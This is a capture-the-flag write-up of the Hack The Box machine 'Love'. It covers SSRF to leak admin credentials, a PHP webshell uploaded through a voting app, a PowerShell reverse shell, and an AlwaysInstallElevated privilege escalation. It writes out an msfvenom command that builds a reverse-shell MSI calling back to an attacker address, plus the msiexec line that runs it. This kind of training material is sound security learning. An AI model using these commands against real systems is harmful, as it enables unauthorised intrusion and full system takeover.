# LOVE | 10.10.10.239

## Enumeration

    sudo nmap -v -T4 -sCV -oN nmap-initial 10.10.10.239

### Ports and Services

![nmap top 100 port scan](img/0-enum-nmap-initial.png)

A scan of all ports revealed more open ports and services running on this Windows machine, including another webserver on port 5000. Additionally, there are two domains on this IP, 'love.htb' and 'staging.love.htb', and they go to different places. A lot to dig into here.

#### 135 - MSRPC

Trying for a null session here did not let me access anything.

#### 139/445 - SMB

Trying anonymous login to this SMB server failed, so this is likely a dead end for now. Maybe I'll find creds later?

#### 3306 - likely MYSQL

Unable to connect to this remotely.

#### 5000 - HTTP - Apache httpd 2.4.46

Although this really does appear to be a server, I am forbidden from connecting to it at all.

#### 80/443 - HTTP(S) - Apache httpd 2.4.46

This is where most stuff is going on, and probably where I should focus. First up is the main page on 'love.htb', which appears to be a PHP voting system:

![port 80 love.htb](img/0-enum-http-love.png)

Next, at 'staging.htb.love', is a different service, purporting to be a "secure file scanner". There is the chance to sign up and a link to a demo of the service.

![port 80 staging.love.htb](img/0-enum-http-staging.png)

The demo seems to allow you to upload a file to it:

![port 80 staging.love.htb/beta](img/0-enum-http-file-scanner.png)

I made a simple 'hello.txt' file, served it up, and pointed the scanner at it. It displays the file contents, at least for text:

![file scanner result](img/0-enum-scanner-test.png)

Now I will try uploading a PHP reverse shell.

![PHP reverse shell code](img/0-shell-php.png)

The scanner grabbed the file, but displayed nothing on the page and there was no callback to my machine. However when I check the source of the page, I can see the PHP code there:

![Scanner page source](img/0-scanner-source-php-shell.png)

Curious. It could be that I still need to find out where the original file goes and then try to execute it from there.

This next part took up a lot of my time. Eventually I gave up on trying to execute anything with this scanner and instead tried to view local files; I thought I had a Local File Inclusion vulnerability with this service. It was tough going without knowing any of the relevant paths and files that I was looking for. I did some googling and found a basic resource which gave me some ideas of where to look for config files on a Windows installation of xampp. I managed to find a 'vhosts-https.conf' file which gave me more information about the different virtual hosts on the system, including their names. One definitely stands out - the 'passwordmanager' page, which turns out is the service running on port 5000. 

![password manager virtual host info](img/0-scanner-vhosts-conf.png)

You can see there that it is only accessible from localhost. Which gave me an idea:

![Server Side Request Forgery](img/0-admin-creds.png)

For the longest time I was trying LFI techniques and not really getting anywhere, but [SSRF](https://portswigger.net/web-security/ssrf) is what I should have been looking for; this type of vuln allows an attacker to make HTTP requests as if the server itself was doing them. In this case it allows me to see what is on that page on port 5000 - the request is coming from within.

So now I can login to the `/admin` area and have a poke around:

![admin dashboard](img/0-admin-dashboard.png)

It is some kind of implementation of a voting system using PHP. It doesn't look that sophisticated or secure.

## Exploitation - webshell via upload of malicious PHP code to images

After some testing and looking around the dashboard I found I could create a candidate and rather than upload a photo, I could actually upload a PHP file in it's place. I found uploading a simple webshell to work best for my purposes.

### Exploit Method

First thing I had to do was create a 'position' before I could create a candidate:

![create position](img/0-exploit-position.png)

Next I could create my political candidate, so I chose famous anarchist Emma Goldman and made sure to add the webshell.php file to the image upload:

![create candidate](img/0-exploit-candidate.png)  
(Side note: you can use html in the 'Platform' box when adding a new candidate and it actually executes it, which probably means this thing has another vulnerability)

The webshell I used was from [here](https://github.com/artyuum/Simple-PHP-Web-Shell).

After creating the candidate I can see the 'broken' image on the page:

![broken image](img/0-exploit-photo-link.png)

I just right-clicked on it and I was brought to the webshell, so I tested it out:

![Command Execution](img/0-exploit-webshell.png)

So it works! Now let's get a real reverse shell on the machine using PowerShell:

![PowerShell reflective loading of reverse shell](img/0-exploit-powershell.png)

I made sure to have a server running to serve the .ps1 file (it's the Nishang reverse shell), as well as a listener, waiting for the connect back. In a moment I was on the box:

![powershell as phoebe](img/1-proof-user-shell.png)

#### user Flag

![user flag](img/1-proof-user-flag.png)

## Privilege Escalation - phoebe > SYSTEM

### Enumeration

There are no other users besides Administrator on the box, so let's try to either get there or even better become SYSTEM.

Running `systeminfo` confirms that this is a 64-bit Windows 10 Pro machine:

![systeminfo](img/1-enum-sysinfo.png)

Running `whoami /all` shows me that phoebe is not an admin, but is a member of the "Remote Management Users" group, which means if I had the password I could login via winRM. Let's put winpeas on the box to make this go more quickly. Some notables:

* There are two paths on the filesystem that are whitelisted, meaning that Windows Defender will not scan files in those folders, but because this is a Hack the Box machine I bet it's disabled anyway:

![whitelisted paths](img/1-enum-whitelist-paths.png)

* The big finding is that "AlwaysInstallElevated" is set to true in two crucial parts of the system registry:

![AlwaysInstallElevated](img/1-enum-alwaysinstallelevated.png)

This means I can create a malicious .msi file and it will run with SYSTEM privileges, giving me full access to the machine. Let's do this.

### Exploit method

The first way I learned about how to pull this off was using a Windows VM that I had GUI access to; by using an enumeration tool called "PowerUp" - but I have to do something different in this case. 

My first step is to create the malicious .msi file, and I can use msfvenom for this:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.26 LPORT=53 -f msi -o koopa.msi
```

Next I transfer it over to the target and spin up a netcat listener on port 53 (in this case).

![Uploaded malicious .msi file](img/1-exploit-msi.png)

Now, this part took some tinkering, as I am in a powershell session. If I was in a command session it would be more straightforward. Oh and I should mention that I ran into major issues when I made the reverse payload a powershell instance, which is why I chose 'shell_reverse_tcp' above.

```powershell
cmd.exe /c msiexec /i koopa.msi
```

![Command shell as SYSTEM](img/2-proof-system-shell.png)

#### root Flag

![root flag](img/2-proof-root-flag.png)

## Conclusion

Pretty interesting machine I must say. The initial foothold was a bit frustrating until I realized that the scanner had a SSRF rather than an LFI vulnerability. Now I know what to look for in the future. The privesc was standard Windows stuff and not too difficult. I am glad that I know how to do that one without access to a GUI.

**Steps taken:**

* Enumerate until staging subdomain found
* Test scanner page, find LFI and SSRF
* Use LFI to enumerate service on port 5000
* Use SSRF to access credentials on port 5000, login as admin to PHP app
* Use unrestricted upload vuln to upload PHP webshell
* Use webshell to download and execute powershell reverse shell
* Enumerate machine to find 'AlwaysInstallElevated' enabled
* Generate malicious .msi and escalate to SYSTEM.
